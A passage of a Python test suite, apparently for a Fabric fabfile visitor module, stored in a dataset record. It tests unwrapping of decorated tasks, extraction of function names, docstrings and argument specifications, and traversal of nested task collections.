= roles('foo')(task()(fn))\n assert visitor.unwrap(t) is fn\n\n def test_lambda(self):\n fn = lambda: None\n assert visitor.unwrap(fn) is fn\n\n def test_lambda_task(self):\n fn = lambda: None\n t = task(fn)\n assert visitor.unwrap(t) is fn\n\n\nclass TestVisitTask(object):\n def test_no_args(self):\n def fn():\n pass\n assert visitor.visit_task(fn, ()) == {\n 'name': 'fn',\n 'path': (),\n 'doc': None,\n 'cron': None,\n 'argspec': {\n 'args': [],\n 'varargs': None,\n 'keywords': None,\n 'defaults': None,\n },\n }\n\n def test_simple_args(self):\n def fn(a, b):\n pass\n assert visitor.visit_task(fn, ()) == {\n 'name': 'fn',\n 'path': (),\n 'doc': None,\n 'cron': None,\n 'argspec': {\n 'args': ['a', 'b'],\n 'varargs': None,\n 'keywords': None,\n 'defaults': None,\n },\n }\n\n def test_arg_defaults(self):\n def fn(a, b=1, c=None):\n pass\n assert visitor.visit_task(fn, ()) == {\n 'name': 'fn',\n 'path': (),\n 'doc': None,\n 'cron': None,\n 'argspec': {\n 'args': ['a', 'b', 'c'],\n 'varargs': None,\n 'keywords': None,\n 'defaults': (1, None),\n },\n }\n\n def test_varargs(self):\n def fn(*args, **kwargs):\n pass\n assert visitor.visit_task(fn, ()) == {\n 'name': 'fn',\n 'path': (),\n 'doc': None,\n 'cron': None,\n 'argspec': {\n 'args': [],\n 'varargs': 'args',\n 'keywords': 'kwargs',\n 'defaults': None,\n },\n }\n\n def test_docs(self):\n def fn(*args, **kwargs):\n \"\"\"I am a teapot.\"\"\"\n pass\n assert visitor.visit_task(fn, ()) == {\n 'name': 'fn',\n 'path': (),\n 'doc': 'I am a teapot.',\n 'cron': None,\n 'argspec': {\n 'args': [],\n 'varargs': 'args',\n 'keywords': 'kwargs',\n 'defaults': None,\n },\n }\n\n\nclass TestVisit(object):\n def test_single(self):\n def fn():\n pass\n callables = {\n 'fn': fn,\n }\n data = visitor.visit(callables)\n assert len(data) == 1\n assert data[0]['name'] == 'fn'\n\n def test_multi(self):\n def fn():\n pass\n def fn2():\n pass\n def fn3():\n pass\n callables = {\n 'fn': fn,\n 'fn2': fn2,\n 'fn3': fn3,\n }\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[1]['name'] == 'fn2'\n assert data[2]['name'] == 'fn3'\n\n def test_nested(self):\n def fn():\n pass\n def fn2():\n pass\n def fn3():\n pass\n callables = {\n 'fn': fn,\n 'mod': {\n 'fn2': fn2,\n 'fn3': fn3,\n }\n }\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[0]['path'] == ()\n assert data[1]['name'] == 'fn2'\n assert data[1]['path'] == ('mod',)\n assert data[2]['name'] == 'fn3'\n assert data[2]['path'] == ('mod',)\n\n\nclass TestVisitFabfile(object):\n def test_one(self):\n data = visitor.visit_fabfile(fixture_path('fabfile_one.py'))\n assert len(data) == 3\n",
"step-ids": [
14,
15,
20,
25,
26
]
}
|
[
14,
15,
20,
25,
26
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.